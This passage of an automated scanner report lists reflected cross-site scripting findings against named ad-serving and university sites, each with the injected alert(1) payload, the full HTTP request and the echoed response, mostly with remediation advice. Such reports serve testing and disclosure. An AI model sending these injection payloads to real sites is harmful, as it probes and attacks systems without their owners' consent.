GET /adj/N5552.3159.GOOGLECN.COM/B4896920.18;sz=160x600;click=http://googleads.g.doubleclick.net/aclk?sa=L&ai=B-YKuIc_tTL_fD4u0sQeTq-HrD6ejw8wBj9mNmR-v4fLfQgAQARgBIJPFkxU4AFCHuvyS-_____8BYMmG7YiEpOwPsgEOd2lraXRyYXZlbC5vcme6AQoxNjB4NjAwX2FzyAEJ2gFCaHR0cDovL3dpa2l0cmF2ZWwub3JnL2VuL1Rvcm9udG9hMzMzZS8nJTNCYWxlcnQoMSkvYWY4MTI5ZjdiNTQveDIymAKeCrgCGMACAcgC1-qjFKgDAfUDAAAARA&num=1&sig=AGiWqtw0gD0P1sHXR_gsepTqGEsqyyW9iA&client=ca-pub-7695515998152344244e8"-alert(1)-"214cc8b87e2&adurl=;ord=525715793? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=OPT_OUT; VWCUKP300ad=L0/Q53624_9650_5_110510_1_123110_338790x320289x110510x1x1

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Date: Thu, 25 Nov 2010 03:22:34 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 7261

document.write('<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->\r\n<!-- Code auto-generated on Fri Nov 05 15:13:18 EDT 2010 -->\r\n<script src=\"http://s0.2mdn.net/
...[SNIP]...
gFCaHR0cDovL3dpa2l0cmF2ZWwub3JnL2VuL1Rvcm9udG9hMzMzZS8nJTNCYWxlcnQoMSkvYWY4MTI5ZjdiNTQveDIymAKeCrgCGMACAcgC1-qjFKgDAfUDAAAARA&num=1&sig=AGiWqtw0gD0P1sHXR_gsepTqGEsqyyW9iA&client=ca-pub-7695515998152344244e8"-alert(1)-"214cc8b87e2&adurl=http%3a%2f%2fwww.waldorfastoria.com/bestofwaldorfastoria%3FWT.mc_id%3DzWAWAAA0US1WA2DMH3Google4BestofWinter7BR840632%26cssiteid%3D1004575%26csdartid%3D5603020439232393");
var fscUrl = url;
var
...[SNIP]...

2.6. http://ad.doubleclick.net/adj/N5552.3159.GOOGLECN.COM/B4896920.18 [client parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adj/N5552.3159.GOOGLECN.COM/B4896920.18

Issue detail

The value of the client request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 862a1'-alert(1)-'49b987d72cc was submitted in the client parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adj/N5552.3159.GOOGLECN.COM/B4896920.18;sz=160x600;click=http://googleads.g.doubleclick.net/aclk?sa=L&ai=B-YKuIc_tTL_fD4u0sQeTq-HrD6ejw8wBj9mNmR-v4fLfQgAQARgBIJPFkxU4AFCHuvyS-_____8BYMmG7YiEpOwPsgEOd2lraXRyYXZlbC5vcme6AQoxNjB4NjAwX2FzyAEJ2gFCaHR0cDovL3dpa2l0cmF2ZWwub3JnL2VuL1Rvcm9udG9hMzMzZS8nJTNCYWxlcnQoMSkvYWY4MTI5ZjdiNTQveDIymAKeCrgCGMACAcgC1-qjFKgDAfUDAAAARA&num=1&sig=AGiWqtw0gD0P1sHXR_gsepTqGEsqyyW9iA&client=ca-pub-7695515998152344862a1'-alert(1)-'49b987d72cc&adurl=;ord=525715793? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=OPT_OUT; VWCUKP300ad=L0/Q53624_9650_5_110510_1_123110_338790x320289x110510x1x1

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Date: Thu, 25 Nov 2010 03:22:39 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 7261

document.write('<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->\r\n<!-- Code auto-generated on Fri Nov 05 15:13:18 EDT 2010 -->\r\n<script src=\"http://s0.2mdn.net/
...[SNIP]...
gFCaHR0cDovL3dpa2l0cmF2ZWwub3JnL2VuL1Rvcm9udG9hMzMzZS8nJTNCYWxlcnQoMSkvYWY4MTI5ZjdiNTQveDIymAKeCrgCGMACAcgC1-qjFKgDAfUDAAAARA&num=1&sig=AGiWqtw0gD0P1sHXR_gsepTqGEsqyyW9iA&client=ca-pub-7695515998152344862a1'-alert(1)-'49b987d72cc&adurl=http%3a%2f%2fwww.waldorfastoria.com/bestofwaldorfastoria%3FWT.mc_id%3DzWAWAAA0US1WA2DMH3Google4BestofWinter7BR840632%26cssiteid%3D1004575%26csdartid%3D5603020439232393\">
...[SNIP]...

2.7. http://ad.doubleclick.net/adj/N5552.3159.GOOGLECN.COM/B4896920.18 [num parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adj/N5552.3159.GOOGLECN.COM/B4896920.18

Issue detail

The value of the num request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload febe9"-alert(1)-"13acb3502b9 was submitted in the num parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adj/N5552.3159.GOOGLECN.COM/B4896920.18;sz=160x600;click=http://googleads.g.doubleclick.net/aclk?sa=L&ai=B-YKuIc_tTL_fD4u0sQeTq-HrD6ejw8wBj9mNmR-v4fLfQgAQARgBIJPFkxU4AFCHuvyS-_____8BYMmG7YiEpOwPsgEOd2lraXRyYXZlbC5vcme6AQoxNjB4NjAwX2FzyAEJ2gFCaHR0cDovL3dpa2l0cmF2ZWwub3JnL2VuL1Rvcm9udG9hMzMzZS8nJTNCYWxlcnQoMSkvYWY4MTI5ZjdiNTQveDIymAKeCrgCGMACAcgC1-qjFKgDAfUDAAAARA&num=1febe9"-alert(1)-"13acb3502b9&sig=AGiWqtw0gD0P1sHXR_gsepTqGEsqyyW9iA&client=ca-pub-7695515998152344&adurl=;ord=525715793? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=OPT_OUT; VWCUKP300ad=L0/Q53624_9650_5_110510_1_123110_338790x320289x110510x1x1

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Date: Thu, 25 Nov 2010 03:21:09 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 7261

document.write('<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->\r\n<!-- Code auto-generated on Fri Nov 05 15:13:18 EDT 2010 -->\r\n<script src=\"http://s0.2mdn.net/
...[SNIP]...
HuvyS-_____8BYMmG7YiEpOwPsgEOd2lraXRyYXZlbC5vcme6AQoxNjB4NjAwX2FzyAEJ2gFCaHR0cDovL3dpa2l0cmF2ZWwub3JnL2VuL1Rvcm9udG9hMzMzZS8nJTNCYWxlcnQoMSkvYWY4MTI5ZjdiNTQveDIymAKeCrgCGMACAcgC1-qjFKgDAfUDAAAARA&num=1febe9"-alert(1)-"13acb3502b9&sig=AGiWqtw0gD0P1sHXR_gsepTqGEsqyyW9iA&client=ca-pub-7695515998152344&adurl=http%3a%2f%2fwww.waldorfastoria.com/bestofwaldorfastoria%3FWT.mc_id%3DzWAWAAA0US1WA2DMH3Google4BestofWinter7BR840632%26cssit
...[SNIP]...

2.8. http://ad.doubleclick.net/adj/N5552.3159.GOOGLECN.COM/B4896920.18 [num parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adj/N5552.3159.GOOGLECN.COM/B4896920.18

Issue detail

The value of the num request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 472d0'-alert(1)-'dbef4414a82 was submitted in the num parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adj/N5552.3159.GOOGLECN.COM/B4896920.18;sz=160x600;click=http://googleads.g.doubleclick.net/aclk?sa=L&ai=B-YKuIc_tTL_fD4u0sQeTq-HrD6ejw8wBj9mNmR-v4fLfQgAQARgBIJPFkxU4AFCHuvyS-_____8BYMmG7YiEpOwPsgEOd2lraXRyYXZlbC5vcme6AQoxNjB4NjAwX2FzyAEJ2gFCaHR0cDovL3dpa2l0cmF2ZWwub3JnL2VuL1Rvcm9udG9hMzMzZS8nJTNCYWxlcnQoMSkvYWY4MTI5ZjdiNTQveDIymAKeCrgCGMACAcgC1-qjFKgDAfUDAAAARA&num=1472d0'-alert(1)-'dbef4414a82&sig=AGiWqtw0gD0P1sHXR_gsepTqGEsqyyW9iA&client=ca-pub-7695515998152344&adurl=;ord=525715793? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=OPT_OUT; VWCUKP300ad=L0/Q53624_9650_5_110510_1_123110_338790x320289x110510x1x1

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Date: Thu, 25 Nov 2010 03:21:13 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 7261

document.write('<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->\r\n<!-- Code auto-generated on Fri Nov 05 15:13:18 EDT 2010 -->\r\n<script src=\"http://s0.2mdn.net/
...[SNIP]...
HuvyS-_____8BYMmG7YiEpOwPsgEOd2lraXRyYXZlbC5vcme6AQoxNjB4NjAwX2FzyAEJ2gFCaHR0cDovL3dpa2l0cmF2ZWwub3JnL2VuL1Rvcm9udG9hMzMzZS8nJTNCYWxlcnQoMSkvYWY4MTI5ZjdiNTQveDIymAKeCrgCGMACAcgC1-qjFKgDAfUDAAAARA&num=1472d0'-alert(1)-'dbef4414a82&sig=AGiWqtw0gD0P1sHXR_gsepTqGEsqyyW9iA&client=ca-pub-7695515998152344&adurl=http%3a%2f%2fwww.waldorfastoria.com/bestofwaldorfastoria%3FWT.mc_id%3DzWAWAAA0US1WA2DMH3Google4BestofWinter7BR840632%26cssit
...[SNIP]...

2.9. http://ad.doubleclick.net/adj/N5552.3159.GOOGLECN.COM/B4896920.18 [sig parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adj/N5552.3159.GOOGLECN.COM/B4896920.18

Issue detail

The value of the sig request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload afd99'-alert(1)-'ef559114c82 was submitted in the sig parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adj/N5552.3159.GOOGLECN.COM/B4896920.18;sz=160x600;click=http://googleads.g.doubleclick.net/aclk?sa=L&ai=B-YKuIc_tTL_fD4u0sQeTq-HrD6ejw8wBj9mNmR-v4fLfQgAQARgBIJPFkxU4AFCHuvyS-_____8BYMmG7YiEpOwPsgEOd2lraXRyYXZlbC5vcme6AQoxNjB4NjAwX2FzyAEJ2gFCaHR0cDovL3dpa2l0cmF2ZWwub3JnL2VuL1Rvcm9udG9hMzMzZS8nJTNCYWxlcnQoMSkvYWY4MTI5ZjdiNTQveDIymAKeCrgCGMACAcgC1-qjFKgDAfUDAAAARA&num=1&sig=AGiWqtw0gD0P1sHXR_gsepTqGEsqyyW9iAafd99'-alert(1)-'ef559114c82&client=ca-pub-7695515998152344&adurl=;ord=525715793? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=OPT_OUT; VWCUKP300ad=L0/Q53624_9650_5_110510_1_123110_338790x320289x110510x1x1

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Date: Thu, 25 Nov 2010 03:21:59 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 7261

document.write('<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->\r\n<!-- Code auto-generated on Fri Nov 05 15:13:18 EDT 2010 -->\r\n<script src=\"http://s0.2mdn.net/
...[SNIP]...
ZlbC5vcme6AQoxNjB4NjAwX2FzyAEJ2gFCaHR0cDovL3dpa2l0cmF2ZWwub3JnL2VuL1Rvcm9udG9hMzMzZS8nJTNCYWxlcnQoMSkvYWY4MTI5ZjdiNTQveDIymAKeCrgCGMACAcgC1-qjFKgDAfUDAAAARA&num=1&sig=AGiWqtw0gD0P1sHXR_gsepTqGEsqyyW9iAafd99'-alert(1)-'ef559114c82&client=ca-pub-7695515998152344&adurl=http%3a%2f%2fwww.waldorfastoria.com/bestofwaldorfastoria%3FWT.mc_id%3DzWAWAAA0US1WA2DMH3Google4BestofWinter7BR840632%26cssiteid%3D1004575%26csdartid%3D560302043923
...[SNIP]...

2.10. http://ad.doubleclick.net/adj/N5552.3159.GOOGLECN.COM/B4896920.18 [sig parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adj/N5552.3159.GOOGLECN.COM/B4896920.18

Issue detail

The value of the sig request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 55a7b"-alert(1)-"b3463074281 was submitted in the sig parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adj/N5552.3159.GOOGLECN.COM/B4896920.18;sz=160x600;click=http://googleads.g.doubleclick.net/aclk?sa=L&ai=B-YKuIc_tTL_fD4u0sQeTq-HrD6ejw8wBj9mNmR-v4fLfQgAQARgBIJPFkxU4AFCHuvyS-_____8BYMmG7YiEpOwPsgEOd2lraXRyYXZlbC5vcme6AQoxNjB4NjAwX2FzyAEJ2gFCaHR0cDovL3dpa2l0cmF2ZWwub3JnL2VuL1Rvcm9udG9hMzMzZS8nJTNCYWxlcnQoMSkvYWY4MTI5ZjdiNTQveDIymAKeCrgCGMACAcgC1-qjFKgDAfUDAAAARA&num=1&sig=AGiWqtw0gD0P1sHXR_gsepTqGEsqyyW9iA55a7b"-alert(1)-"b3463074281&client=ca-pub-7695515998152344&adurl=;ord=525715793? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=OPT_OUT; VWCUKP300ad=L0/Q53624_9650_5_110510_1_123110_338790x320289x110510x1x1

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Date: Thu, 25 Nov 2010 03:21:54 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 7261

document.write('<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->\r\n<!-- Code auto-generated on Fri Nov 05 15:13:18 EDT 2010 -->\r\n<script src=\"http://s0.2mdn.net/
...[SNIP]...
ZlbC5vcme6AQoxNjB4NjAwX2FzyAEJ2gFCaHR0cDovL3dpa2l0cmF2ZWwub3JnL2VuL1Rvcm9udG9hMzMzZS8nJTNCYWxlcnQoMSkvYWY4MTI5ZjdiNTQveDIymAKeCrgCGMACAcgC1-qjFKgDAfUDAAAARA&num=1&sig=AGiWqtw0gD0P1sHXR_gsepTqGEsqyyW9iA55a7b"-alert(1)-"b3463074281&client=ca-pub-7695515998152344&adurl=http%3a%2f%2fwww.waldorfastoria.com/bestofwaldorfastoria%3FWT.mc_id%3DzWAWAAA0US1WA2DMH3Google4BestofWinter7BR840632%26cssiteid%3D1004575%26csdartid%3D560302043923
...[SNIP]...

2.11. http://ad.doubleclick.net/adj/N5552.3159.GOOGLECN.COM/B4896920.18 [sz parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adj/N5552.3159.GOOGLECN.COM/B4896920.18

Issue detail

The value of the sz request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 50534"-alert(1)-"1d4619175ce was submitted in the sz parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adj/N5552.3159.GOOGLECN.COM/B4896920.18;sz=160x600;click=http://googleads.g.doubleclick.net/aclk?sa=L50534"-alert(1)-"1d4619175ce&ai=B-YKuIc_tTL_fD4u0sQeTq-HrD6ejw8wBj9mNmR-v4fLfQgAQARgBIJPFkxU4AFCHuvyS-_____8BYMmG7YiEpOwPsgEOd2lraXRyYXZlbC5vcme6AQoxNjB4NjAwX2FzyAEJ2gFCaHR0cDovL3dpa2l0cmF2ZWwub3JnL2VuL1Rvcm9udG9hMzMzZS8nJTNCYWxlcnQoMSkvYWY4MTI5ZjdiNTQveDIymAKeCrgCGMACAcgC1-qjFKgDAfUDAAAARA&num=1&sig=AGiWqtw0gD0P1sHXR_gsepTqGEsqyyW9iA&client=ca-pub-7695515998152344&adurl=;ord=525715793? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=OPT_OUT; VWCUKP300ad=L0/Q53624_9650_5_110510_1_123110_338790x320289x110510x1x1

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Date: Thu, 25 Nov 2010 03:19:57 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 7261

document.write('<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->\r\n<!-- Code auto-generated on Fri Nov 05 15:13:18 EDT 2010 -->\r\n<script src=\"http://s0.2mdn.net/
...[SNIP]...
= escape("http://ad.doubleclick.net/click%3Bh%3Dv8/3a5d/f/1a2/%2a/h%3B232397559%3B0-0%3B0%3B56030204%3B2321-160/600%3B39232393/39250180/1%3B%3B%7Esscs%3D%3fhttp://googleads.g.doubleclick.net/aclk?sa=L50534"-alert(1)-"1d4619175ce&ai=B-YKuIc_tTL_fD4u0sQeTq-HrD6ejw8wBj9mNmR-v4fLfQgAQARgBIJPFkxU4AFCHuvyS-_____8BYMmG7YiEpOwPsgEOd2lraXRyYXZlbC5vcme6AQoxNjB4NjAwX2FzyAEJ2gFCaHR0cDovL3dpa2l0cmF2ZWwub3JnL2VuL1Rvcm9udG9hMzMzZS8nJTNCYWxl
...[SNIP]...

2.12. http://ad.doubleclick.net/adj/N5552.3159.GOOGLECN.COM/B4896920.18 [sz parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adj/N5552.3159.GOOGLECN.COM/B4896920.18

Issue detail

The value of the sz request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 41b57'-alert(1)-'2099f4d7dba was submitted in the sz parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adj/N5552.3159.GOOGLECN.COM/B4896920.18;sz=160x600;click=http://googleads.g.doubleclick.net/aclk?sa=L41b57'-alert(1)-'2099f4d7dba&ai=B-YKuIc_tTL_fD4u0sQeTq-HrD6ejw8wBj9mNmR-v4fLfQgAQARgBIJPFkxU4AFCHuvyS-_____8BYMmG7YiEpOwPsgEOd2lraXRyYXZlbC5vcme6AQoxNjB4NjAwX2FzyAEJ2gFCaHR0cDovL3dpa2l0cmF2ZWwub3JnL2VuL1Rvcm9udG9hMzMzZS8nJTNCYWxlcnQoMSkvYWY4MTI5ZjdiNTQveDIymAKeCrgCGMACAcgC1-qjFKgDAfUDAAAARA&num=1&sig=AGiWqtw0gD0P1sHXR_gsepTqGEsqyyW9iA&client=ca-pub-7695515998152344&adurl=;ord=525715793? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=OPT_OUT; VWCUKP300ad=L0/Q53624_9650_5_110510_1_123110_338790x320289x110510x1x1

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Date: Thu, 25 Nov 2010 03:20:02 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 7261

document.write('<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->\r\n<!-- Code auto-generated on Fri Nov 05 15:13:18 EDT 2010 -->\r\n<script src=\"http://s0.2mdn.net/
...[SNIP]...
k\" href=\"http://ad.doubleclick.net/click%3Bh%3Dv8/3a5d/f/1a2/%2a/h%3B232397559%3B0-0%3B0%3B56030204%3B2321-160/600%3B39232393/39250180/1%3B%3B%7Esscs%3D%3fhttp://googleads.g.doubleclick.net/aclk?sa=L41b57'-alert(1)-'2099f4d7dba&ai=B-YKuIc_tTL_fD4u0sQeTq-HrD6ejw8wBj9mNmR-v4fLfQgAQARgBIJPFkxU4AFCHuvyS-_____8BYMmG7YiEpOwPsgEOd2lraXRyYXZlbC5vcme6AQoxNjB4NjAwX2FzyAEJ2gFCaHR0cDovL3dpa2l0cmF2ZWwub3JnL2VuL1Rvcm9udG9hMzMzZS8nJTNCYWxl
...[SNIP]...

2.13. http://adc2.adcentriconline.com/adcentric/form/1679/2/48846 [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://adc2.adcentriconline.com
Path:   /adcentric/form/1679/2/48846

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a8962"><script>alert(1)</script>0a731728c7e was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adcentric/form/1679/2/48846?a8962"><script>alert(1)</script>0a731728c7e=1 HTTP/1.1
Host: adc2.adcentriconline.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ADCUserID=NkDrm5M4SVIi4zZ; 1679-1-48846=12370;

Response

HTTP/1.1 200 OK
Date: Thu, 25 Nov 2010 03:33:17 GMT
Server: Apache
X-RealServer: h010
P3P: CP="NOI OTC OTP OUR NOR"
Cache-Control: no-cache, no-store, must-revalidate, proxy-revalidate
Pragma: no-cache
Expires: Thu, 23 Sep 2004 17:42:04 GMT
Set-cookie: ADCUserID=NkDrm5M4SVIi4zZ; expires=Friday, 02-Oct-2020 23:33:17 GMT; path=/; domain=.adcentriconline.com;
Location: http://www.healthycanadians.gc.ca/kids?a8962"><script>alert(1)</script>0a731728c7e=1
Refresh: 0; URL=http://www.healthycanadians.gc.ca/kids?a8962"><script>alert(1)</script>0a731728c7e=1
Connection: close
Content-Type: text/html
Content-Length: 200

<html><head><meta http-equiv="Refresh" content="0; URL=http://www.healthycanadians.gc.ca/kids?a8962"><script>alert(1)</script>0a731728c7e=1"><title> </title></head><body bgcolor="white"></body></html>

2.14. http://ads.gmodules.com/gadgets/ifr [url parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ads.gmodules.com
Path:   /gadgets/ifr

Issue detail

The value of the url request parameter is copied into a JavaScript rest-of-line comment. The payload 9acf1%0aalert(1)//235da456126 was submitted in the url parameter. This input was echoed as 9acf1
alert(1)//235da456126
in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /gadgets/ifr?synd=ads&url=http%3A%2F%2Fwww.ljmsite.com%2Fgoogle%2Fgadgetads%2Fkayakhotel%2F728x90.xml9acf1%0aalert(1)//235da456126&lang=en&country=US&up_clickurl=http://googleads.g.doubleclick.net/aclk%3Fsa%3Dl%26ai%3DBRTc0M9TtTK24PM27sQfBmJSNAba1nskBoI-lohHAjbcBgJciEAEYASCp2qQSOABQm9vQugFgyYbtiISk7A-gAcSR-u4DsgEVd3d3Lm1vbnRyZWFsa2lvc2suY29tugEJNzI4eDkwX2FzyAEJ2gEdaHR0cDovL3d3dy5tb250cmVhbGtpb3NrLmNvbS-4AhjIArbkuROoAwHoA_Yo6APEBegDiCnoA_MH9QMAQADE%26num%3D1%26ggladgrp%3D7500698640161137384%26gglcreat%3D8587149626781171265%26sig%3DAGiWqtwSH_uwjfyq_9ry7bUkk1wsJ734Bw%26client%3Dca-pub-1921508190133428%26adurl%3D&up_aiturl=http://googleads.g.doubleclick.net/pagead/conversion/%3Fai%3DBRTc0M9TtTK24PM27sQfBmJSNAba1nskBoI-lohHAjbcBgJciEAEYASCp2qQSOABQm9vQugFgyYbtiISk7A-gAcSR-u4DsgEVd3d3Lm1vbnRyZWFsa2lvc2suY29tugEJNzI4eDkwX2FzyAEJ2gEdaHR0cDovL3d3dy5tb250cmVhbGtpb3NrLmNvbS-4AhjIArbkuROoAwHoA_Yo6APEBegDiCnoA_MH9QMAQADE%26sigh%3DG4ZCsaj2ST4%26label%3D_AITNAME_%26value%3D_AITVALUE_&up_ads_clicktarget_new_=0&up_rawquery=montreal%20accommodations&up_city=Boston&up_region=US-MA&up_lat=42.36&up_long=-71.06\ HTTP/1.1
Host: ads.gmodules.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 400 Bad Request
P3P: CP="CAO PSA OUR"
Content-Type: text/html; charset=UTF-8
Date: Thu, 25 Nov 2010 03:33:32 GMT
Expires: Thu, 25 Nov 2010 03:33:32 GMT
Cache-Control: private, max-age=0
X-Content-Type-Options: nosniff
X-XSS-Protection: 1; mode=block
Server: GSE
Connection: close

Unable to retrieve spec for http://www.ljmsite.com/google/gadgetads/kayakhotel/728x90.xml9acf1
alert(1)//235da456126
. HTTP error 400

2.15. http://alumni.utoronto.ca/s/731/index.aspx [gid parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://alumni.utoronto.ca
Path:   /s/731/index.aspx

Issue detail

The value of the gid request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 31e5d'-alert(1)-'fdc12b29cb was submitted in the gid parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /s/731/index.aspx?sid=731&gid=3631e5d'-alert(1)-'fdc12b29cb&pgid=8&cid=46 HTTP/1.1
Host: alumni.utoronto.ca
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
